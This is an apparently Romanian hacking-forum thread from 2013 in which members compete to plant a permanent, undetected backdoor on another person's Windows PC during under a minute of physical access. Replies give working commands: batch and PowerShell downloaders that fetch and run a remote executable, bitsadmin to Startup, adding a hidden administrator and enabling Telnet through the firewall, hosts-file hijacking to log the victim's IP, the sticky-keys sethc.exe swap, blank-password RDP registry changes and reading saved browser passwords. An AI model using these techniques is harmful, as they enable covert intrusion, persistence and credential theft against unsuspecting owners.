Backdoor in 45 seconds - Challenge

[em]

Sa presupunem ca esti la cineva acasa si lipseste un timp foarte scurt de la calculator (30secunde - 1minut).

Scopul tau. Sa iti asiguri un backdoor permanent la acel calculator.

Piedici:

* Calculatorul nu are net in acel moment.

* Nu ai cu tine niciun stick USB/CD whatevar.

* Ownerul calculatorului nu trebuie sa se prinda de nimic.

Va castiga cel cu solutia cea mai ingenioasa care ofera controlul cel mai mare la resursele sistemului. Luati in calcul si un posibil antivirus.

Restrictii:

* Windows

Premiu:

* O carte de programare. (cat 2 biblii)

[sandabot]

Allow RDP .

/thread

[em]

Allow RDP .

/thread

Decent? calea pe care ai pornit. Mai r?mâne de stabilit ce IP are victima. Cum faci asta?

[Renegade]

- sa incercam sa configuram un RDP pe acel sistem.

- am mai putea crea un fisier.bat care sa downloadeze si mai apoi sa execute un fisier de pe un ftp sau site (pentru executare sa il punem in start-up sau intr-un autorun.inf pe toate partitiile)

Sunt curios ce raspunsuri vor da altii deoarece timpul acordat e foarte scurt,surse externe nu ai pentru a downloada,instala altceva.

Daca considerati ca am scris SF-uri,va rog corectati-ma

[sandabot]

Decent? calea pe care ai pornit. Mai r?mâne de stabilit ce IP are victima. Cum faci asta?

Mai am timp sa schimb homepage-ul de la browser cu un link care iti trimite automat adresa de IP prin mail (sunt destule servicii free pe net) , imediat ce se conecteaza la internet si deschide browserul , voi primi un mail cu IP-ul sau .

[Renegade]

@sandabot - sau sa setezi ca homepage un site facut de tine care sa scrie IP-ul victimei intr-un fisier tot la tine pe site si imediat sa il redirectioneze pe google,sau alta pagina.

[Silviu]

Fisier bat:

start PowerShell.exe

(New-Object System.Net.WebClient).DownloadFile("http://site.net/fisier.exe","C:\fisier.exe")

start C:\fisier.exe

Doar o idee..

[BogdanNBV]

Stergi system32, te faci ca ploua cand vede ca nu mai merge, si cum te stie bun in d-ale pc-urilor te cheama sa il reinstalezi.

Ai castigat timp cacalau pana a 2-a zi sau cand te duci sa-l instalezi sa te pregatesti cu tot ce vrei.

Ideea e sa-l strici in alea 45 secunde sau cat ai si dupaia te oferi sa-i reinstalezi sistemul de operare => timp suficient pentru orice

Edited May 4, 2013 by BogdanNBV

[eusimplu]

Daca era laptop:

Imi „tranformam” telefonul intr-un hotspot wifi, iar odata ce laptop-ul avea internet ii puteam downloada pana si filme porno fara sa-si dea seama.

Daca era PC sau laptop si avea AutoIt instalat:

Asta s-ar fi putut intampla foarte rar, dar nu excludem cazul.

Faceam un script in AutoIt care sa-mi poata asigura backdoorul si sa-mi poata oferii ip-ul si-l puneam sa ruleze la fiecare pornire. (chiar dureaza putin)

Sa nu-mi spuneti ca nu aveam telefonul la mine, asa ceva nu exista

[nedo]

Modific in hosts cateva site-uri sa indice catre clone facute/hostate de mine.(pentru a obtine ip-ul)

Creez un user nou cu o parola pusa de mine si activez optiunea de rdp.creez un mic bat care sa se conecteze prin telnet la mine si sa imi trimita ip-ul si poate alte informatii

bat-ul il bag la autorun pe toate partitiile.

Modific in group policy sa nu faca lock-out dupa un anumit numar de incercari de logare, si incerc sa fac bruteforce dupa aia(conjunctie cu telnetu/hosts-ul).

Modific tot in gp sa ma pot loga cu guest prin rdp.

[em]

Modific in hosts cateva site-uri sa indice catre clone facute/hostate de mine.(pentru a obtine ip-ul)

Creez un user nou cu o parola pusa de mine si activez optiunea de rdp.creez un mic bat care sa se conecteze prin telnet la mine si sa imi trimita ip-ul si poate alte informatii

bat-ul il bag la autorun pe toate partitiile.

Modific in group policy sa nu faca lock-out dupa un anumit numar de incercari de logare, si incerc sa fac bruteforce dupa aia(conjunctie cu telnetu/hosts-ul).

Modific tot in gp sa ma pot loga cu guest prin rdp.

Si in acelasi timp, mergi cu viteza luminii astfel incat timpul sa se dilate. Cele 2 minute care ti-au luat sa faci asta vor parea 45 de secunde pentru tinta.

[black_death_c4t]

start > run > cmd

net user Administrator /active:yes
net user (username) (password) /add
net localgroup Administrators /add (username)
net localgroup /add TelnetClients
net localgroup TelnetClients /add (username)
sc config TlntSvr start= auto


net start TlntSvr
netsh
firewall
add portopening TCP 23 "Telnet" 

next

echo www.google.ro www.domeniulmeu.ro >> C:\Windows\System32\drivers\etc\hosts

cand ajung acasa pun pe domeniulmeu.ro un iframe mare spre pagina de goagal si inserez un mic script ce inregistreaza ip-ul ce ajunge pe pagina

(optional) comenzile pot fi puse intr-un bat si pregatite din timp , astfel incat tot ce avem de facut e sa accesam domeniul.ro/batulmeu.bat , descarcam si executam bat-ul si aia e , asteptam.

Edited May 4, 2013 by black_death_c4t

[nedo]

Nu toate

Ori una ori alta.

Modifici host si crezi fisierul bat

sau Creezi un user nou si activezi rdp

Sau

Modifici in gp lockout-ul la parola gresita si bat-ul/hosts

sau

Modific in gp sa ma pot loga cu guest prin rdp si bat-ul/hosts

[DarkyAngel]

start > run > cmd

net user Administrator /active:yes
net user (username) (password) /add
net localgroup Administrators /add (username)
net localgroup /add TelnetClients
net localgroup TelnetClients /add (username)
sc config TlntSvr start= auto


net start TlntSvr
netsh
firewall
add portopening TCP 23 "Telnet" 

next

echo www.google.ro www.domeniulmeu.ro >> C:\Windows\System32\drivers\etc\hosts

cand ajung acasa pun pe domeniulmeu.ro un iframe mare spre pagina de goagal si inserez un mic script ce inregistreaza ip-ul ce ajunge pe pagina

comenzile pot fi puse intr-un bat si pregatite din timp , astfel incat tot ce avem de facut e sa accesam domeniul.ro/batulmeu.bat , descarcam si executam bat-ul si aia e , asteptam.

nu are net pentru desc?rcarea .bat-ului, ?i ca s? nu-?i dea seama, noi avem deja preg?tit un site care face request pe un ?url= ?i dup? ce îi ia ip îi face redirect pe url-ul respectiv, astfel ii punem doar homepageul in hosts .

[Cryo]

Decent? calea pe care ai pornit. Mai r?mâne de stabilit ce IP are victima. Cum faci asta?

Dupa ce se termina toata faza cu 45sec, ulterior vorbim pe mess si ii aflu ip-ul prin oricare 1000 de metode disponibile (ii arat poza/pagina, fisier, apel audio/video).

Edited May 4, 2013 by Cryo

[curiosul]

Cu putin antrenament scoti sub 35-40 de secunde:

Creezi un .bat cu:

bitsadmin /transfer /download downloadlink.cv C:\StartupDir

Il salvezi intr-un folder sa nu-l gaseasca dupa care creezi o scurtatura in startup a acestui script cu optiunea Run: Minimized.

Daca victima este idioata direct liniile alea la startup.

In cazul in care mai ramane umpic de timp activezi si RDP iar ip-ul il prinzi pe hostul cu fisierul.

O sa vin cu o demonstratie video daca este cazul.

Wow, cand am intrat era un singur post, acuma...

Edit2: Daca vrei se fie ceva mai piperat challenge-ul impune ca victima sa nu fie un idiot ci o presoana care stie cu ce se mananca un calculator, presupunem ca suntem in sediul unei firme, primarii sau alte institutii.

Edited May 4, 2013 by curiosul

[FreddieTux]

Vechea metoda cu sticky keys: deschizi %windir%/System32/, faci o copie de siguranta a lui sethc.exe si apoi copiezi cmd.exe in locul lui. Partea buna e ca ai un fel de "backdoor" in sensul ca poti porni consola cu drepturi de administrator direct din ecranul de autentificare, dar partea rea e ca asta se poate face doar local.

[Silviu]

Ideea numarul 2:

Fisier .bat

start /min chrome.exe ^& exit

start http://site.tld/fisier.exe

sleep 10000

taskkill /IM chrome.exe

start C:\Users\user\Downloads\fisier.exe

Unde chrome.exe este browserul default.

[DarkyAngel]

hai s? v? propun ?i eu o metod? mai eficient? .

- homepageul browserului lui default in hosts spre un link de-al nostru care ii ia ip, apoi face redirect pe $_SERVER['HTTP_HOST']; ( în cazul ?sta, putem avea de dinainte preg?tit scriptul, e folositor s? ai a?a ceva preg?tit oricând)

- un simplu ?i rapid enable la terminal server din cpanel ?i disable din acela?i loc la firewall

acas?, pur ?i simplu folosim unul din zecile de exploituri referitoare la terminal server, gen MS Windows (RPC DCOM) Remote Exploit (Universal Targets). în caz c? nu merge chiar niciunul (0,01% ?ans?) putem da ?i bruteforce cu tsgrinder, ?i avem acces la "terminal" în windows, de unde putem da enable ?i la rdp, ?i multe altele, f?r? ca "ownerul" s?-?i dea seama

[Cryo]

intri in cstrike/resource/GameMenu.res si modifici astfel incat atunci cand da click cand pe "Find servers" sa se conecteze la un domeniu imaginar de-al tau ..... gen cs.ablasadubsa.com (sa fie totusi memorabil), ulterior cumperi domeniul si iti pui serverul de cs pe el, se va conecta la serverul tau si stim cu totii ce securitate are cs....

plus ca jocul ruleaza cu privilegii de administrator (in 99.9% din cazuri), si antivirusul nu va comenta

in cs serverul poate rula fara probleme comenzi consolele clientilor

si avem un oarecare control asupra sistemului

[em]

intri in cstrike/resource/GameMenu.res si modifici astfel incat atunci cand da click cand pe "Find servers" sa se conecteze la un domeniu imaginar de-al tau ..... gen cs.ablasadubsa.com (sa fie totusi memorabil), ulterior cumperi domeniul si iti pui serverul de cs pe el, se va conecta la serverul tau si stim cu totii ce securitate are cs....

plus ca jocul ruleaza cu privilegii de administrator (in 99.9% din cazuri), si antivirusul nu va comenta

in cs serverul poate rula fara probleme comenzi consolele clientilor

si avem un oarecare control asupra sistemului

Curios stiam ca exista exploituri la CS. Cel clasic este in motd-ul care apare dupa ce te-ai conectat la un server pentru ca era randat de Internet Explorer. Dar nu stiu de comenzi date de admin care ar putea compormite securitatea calculatorului. Poti da un exemplu? Exista comenzi care iti permit de exemplu sa scrii fisiere?

[DarkyAngel]

Curios stiam ca exista exploituri la CS. Cel clasic este in motd-ul care apare dupa ce te-ai conectat la un server pentru ca era randat de Internet Explorer. Dar nu stiu de comenzi date de admin care ar putea compormite securitatea calculatorului. Poti da un exemplu? Exista comenzi care iti permit de exemplu sa scrii fisiere?

vorbe?te prostii. singurele comenzi care pot fi executate asupra juc?torului sunt doar comenzile care le poate da ?i juc?torul singur ( quit, kill, connect server.plm, sensitivity 8.0, etc), nu ai control în afara cs-ului. cel cu motd ar fi fost singura op?iune

[Cryo]

da, poti sa-l faci sa downlodeze/suprascrie fisiere din folderul cstrike

am citit undeva niste sf-uri de genul:

-rulezi niste comenzi ce schimba locatia si numele fisierului in care jocul isi tine logul, si il pui in folderul de Startup cu extensia .bat

-scrii linii in log(cod)

-stim cu totii ce se intampla la urmatoarea pornire

dar merge foarte bine si cu motd, chiar am uitat de asta

EDIT: am aflat ca nu functioneaza cazul acela sf, deci ramane motd

dar eu as fi facut altceva...

m-as fi uitat in parolele puse pe remember de browser si as fi memorat cat mai multe

merge repede: tools->options->security->saved passwords, sau ceva de genu

oricum meniurile sunt intuitive

Edited May 4, 2013 by Cryo

[h4sh]

1.Deschizi internet browser-ul(5 secunde)

2.Retii homepage-ul initial si modifici homepage-ul astfel incat sa corespunda cu url catre host-ul sau pagina pe care ai incarca un posibil backdoor (5-10 secunde);

3.Modifici sau bifezi (daca e cazul) optiunea "Save files to.." si retii adresa(path-ul) la care ar fi salvat backdoor-ul(5-10 secunde);

4.Modifici registrii,tinand cont de path-ul unde backdoorul va fi descarcat in momentul in care victima ar redeschide explorerul,in asa fel incat StartUp-ul sa ruleze backdoorul de fiecare data cand calculatorul ar fi reboot-at (10 secunde);

Cam atat ar fi de facut.

Apoi creezi pagina(in cazul in care nu ai fi facut-o inainte) si ai grija ca sa modifici codul paginii respective in asa fel incat,dupa un interval scurt dupa momentul in care victima ar deschide explorerul(ceea ce ar declansa descarcarea automata a backdoor-ului) sa-l redirectioneze catre pagina initiala la care ar fi fost setata optiunea de HomePage a explorerului(vezi pasul 2 "Retii home page-ul initial") pentru a nu atrage atentia.

Apoi creezi un server de ascultare depinzand de backdoor,parametrii si utilitate(in cazul in care ai folosi Metasploit) si pe urma depinde numai de tine...

Astept critici..

Edited May 4, 2013 by h4sh

[dicksi]

ipul nu e atat de important fiindca se poate obtine foarte usor: dupa id de yahoo messenger(sau te duci in yahoo/profiles) sau skype, si apoi afli online cu Get Yahoo Messenger Ip sau SkypeGrab - Free Skype Resolver

in 30 sec max:

system proprieties/allow connection from computers running any version of remote desktop

Local Security Policy > Security Settings > Local Policies > Security Options

At the top of the list is "Accounts: Limit local account use of blank passwords to console logon only"

pus pe disabled sau

HKEY_LOCAL_MACHINE\System\CurrentControlSet\Control\Lsa\LimitBlankPasswordUse set 0

ip>rdp>bootkit

Edited May 4, 2013 by dicksi